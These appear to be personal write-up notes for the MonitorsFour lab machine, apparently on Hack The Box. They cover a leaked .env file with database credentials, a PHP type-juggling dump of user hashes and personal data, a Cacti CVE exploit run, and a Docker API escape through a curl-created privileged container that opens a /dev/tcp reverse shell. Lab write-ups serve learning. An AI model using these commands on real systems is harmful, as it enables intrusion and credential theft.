Monitorfour

NMAP

PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/

Foothold

• the webapp at monitorsfour.htb has a login page but default creds dont work. Forgot password sends to an email page.
• vhost fuzzing found cacti.monitorsfour.htb
• directory fuzzing found .env

  DB_HOST=mariadb
  DB_PORT=3306
  DB_NAME=monitorsfour_db
  DB_USER=monitorsdbuser
  DB_PASS=f37p2j8f4t0r
  

• another interesting endpoint - /user?token=
• Intruder attack to get usernames did not work
• entered 1..100 did not work
• entered 0 and we get the below data

  [{"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},
  {"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},
  {"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},
  {"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]
  

• this is some kind of PHP Type Juggling where strict comparisons are not happening
  • https://secops.group/php-type-juggling-simplified/
• using crackstation:

  admin:wonderful1
  mwatson:
  janderson:
  dthompson:
  

• logged in the portal
• created a new user and checked the user endpoint

  {"id":10,"username":"neal","email":"neal@ecorp.com","password":"5c2b66f41ec8e969bf014934243ff26a","role":"admin","token":null,"name":"Neal","position":"Security Engineer","dob":"2000-12-09","start_date":"2025-12-02","salary":"90000.00"}]
  

• the monitorsfour website has no execution capabilities.
• try the passwords with cacti.m4.htb
• we know the user names.
  • try wonderful1 with admin, mhiggins, mwatson, marcus
  • we see marcus:wonderful1 works
• now we get into the cacti dashboard.
• use https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC/blob/main/exploit.py
• python3 exploit.py -u marcus -p wonderful1 -i 10.10.14.5 -l 443 -url http://cacti.monitorsfour.htb
• start the nc listener and run the above command to get a reverse shell.
• we get a shell as www-data which seems to be a linux docker container.
• go to /home/marcus to get user.txt - 002fe8fc0e4abd650b4c8e0fd049e55d

Privesc

• trying docker escape

  ip addr
  1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
      link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
      inet 127.0.0.1/8 scope host lo
         valid_lft forever preferred_lft forever
      inet6 ::1/128 scope host proto kernel_lo
         valid_lft forever preferred_lft forever
  2: eth0@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
      link/ether ce:48:5c:bc:b7:b9 brd ff:ff:ff:ff:ff:ff link-netnsid 0
      inet 172.18.0.3/16 brd 172.18.255.255 scope global eth0
         valid_lft forever preferred_lft forever
  

• /etc/resolv.conf tells 127.0.0.11 is a dns server (docker dns) redirecting to 192.168.65.7

  cat /etc/resolv.conf
  cat /etc/resolv.conf
  # Generated by Docker Engine.
  # This file can be edited; Docker Engine will not make further changes once it
  # has been modified.
  
  nameserver 127.0.0.11
  options ndots:0
  
  # Based on host file: '/etc/resolv.conf' (internal resolver)
  # ExtServers: [host(192.168.65.7)]
  # Overrides: []
  # Option ndots from: internal
  

• setting up ligolo-agent on the docker foothold

• tried nmap and found mysql open ports but couldnt connect
• downloaded https://github.com/shadow1ng/fscan
• curl http://10.10.14.5/fscan -o fscan

  ./fscan -h 192.168.65.7 -p 1-65535
  
     ___                              _
    / _ \     ___  ___ _ __ __ _  ___| | __
   / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
  / /_\\_____\__ \ (__| | | (_| | (__|   <
  \____/     |___/\___|_|  \__,_|\___|_|\_\
                       fscan version: 1.8.4
  start infoscan
  192.168.65.7:53 open
  192.168.65.7:2375 open
  192.168.65.7:3128 open
  192.168.65.7:5555 open
  [*] alive ports len is: 4
  start vulscan
  [*] WebTitle http://192.168.65.7:2375  code:404 len:29     title:None
  [*] WebTitle http://192.168.65.7:5555  code:200 len:0      title:None
  [+] PocScan http://192.168.65.7:2375 poc-yaml-docker-api-unauthorized-rce
  [+] PocScan http://192.168.65.7:2375 poc-yaml-go-pprof-leak
  已完成 4/4
  [*] 扫描结束,耗时: 16.144064567s
  

• https://medium.com/@iramjack8/container-vulnerabilities-part-3-a77f40828a25
• curl http://10.10.14.5:2375/version
  • this yeilds output meaning that we have access to docker daemon
  • this is an unauthenticated docker daemon
• checking https://github.com/j3r1ch0123/CVE-2025-9074

  # Setup listener on Kali first
  nc -nlvp 443
  
  # Create container (adjust IP/PORT)
  curl -X POST \
    -H "Content-Type: application/json" \
    -d '{"Image":"alpine","Cmd":["sh","-c","chroot /host bash -c '\''bash -i >& /dev/tcp/10.10.14.5/443 0>&1'\''"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
    http://192.168.65.7:2375/containers/create -o create3.json
  
  # Extract container ID
  cid3=$(cut -d'"' -f4 create3.json)
  
  # Start container (triggers reverse shell)
  curl -X POST http://192.168.65.7:2375/containers/$cid3/start
  

• we will see our root reverse shell on the nc listener
• get root.txt in /mnt/host/C/Users/Administrator/Desktop - c032c83ae4780e183d38fd1008d77d33